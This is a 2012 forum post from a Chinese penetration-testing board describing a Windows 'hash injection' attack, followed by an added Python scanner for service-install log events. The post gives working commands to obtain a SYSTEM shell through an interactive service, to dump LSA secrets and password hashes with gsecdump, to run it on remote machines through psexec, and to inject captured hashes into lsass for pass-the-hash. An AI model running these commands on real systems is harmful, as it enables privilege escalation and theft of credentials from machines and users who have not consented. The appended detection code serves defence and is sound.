China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: Hash injection attack

Author: admin    Time: 2012-11-6 21:09
To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the hash information just captured with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, do not actually need to be cracked at all; this is simply a matter of using the tool. As the original article puts it well: whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
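As an added, defender-side example that is not part of the post: a small Python scanner over constructed records in the shape of Windows System log event 7045 ("A service was installed in the system") that flags the two service patterns the post relies on, an interactive shell such as cmd.exe registered as a LocalSystem service and the PsExec helper service (PSEXESVC), so an administrator can spot them in the log. The record layout and sample values are assumptions for the example, not taken from the post.

```python
import re

# Constructed sample records shaped like event 7045 messages (assumed format).
# The first mirrors the sc create trick in the post, the second a PsExec run,
# the third a normal service that must not be flagged.
SAMPLE_7045_RECORDS = """\
Service Name:  shellcmdline
Service File Name:  C:\\WINDOWS\\system32\\cmd.exe /K start
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem
---
Service Name:  PSEXESVC
Service File Name:  %SystemRoot%\\PSEXESVC.exe
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem
---
Service Name:  Spooler
Service File Name:  C:\\WINDOWS\\system32\\spoolsv.exe
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem
"""

SHELL_IMAGES = {"cmd.exe", "powershell.exe"}
FIELD_RE = re.compile(r"^(Service Name|Service File Name|Service Type|"
                      r"Service Start Type|Service Account):\s*(.*)$", re.M)

def parse_records(text):
    """Split the log text on '---' and pull the 7045 fields from each record."""
    records = []
    for chunk in text.split("---"):
        fields = {k: v.strip() for k, v in FIELD_RE.findall(chunk)}
        if fields:
            records.append(fields)
    return records

def image_name(file_name):
    """Basename of the service executable (first token, quoted or not), lower-cased."""
    s = file_name.strip()
    token = s[1:].split('"', 1)[0] if s.startswith('"') else (s.split()[0] if s else "")
    return token.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def flag_record(rec):
    """Return the reasons a single service-install record looks suspicious."""
    reasons, img = [], image_name(rec.get("Service File Name", ""))
    if img in SHELL_IMAGES and rec.get("Service Account", "") == "LocalSystem":
        reasons.append("interactive shell installed as a LocalSystem service")
    if rec.get("Service Name", "").upper() == "PSEXESVC" or img == "psexesvc.exe":
        reasons.append("PsExec service (remote execution)")
    return reasons

def scan(text):
    """(service name, reason) pairs for every flagged record in the log text."""
    return [(r["Service Name"], why) for r in parse_records(text) for why in flag_record(r)]
```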





Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2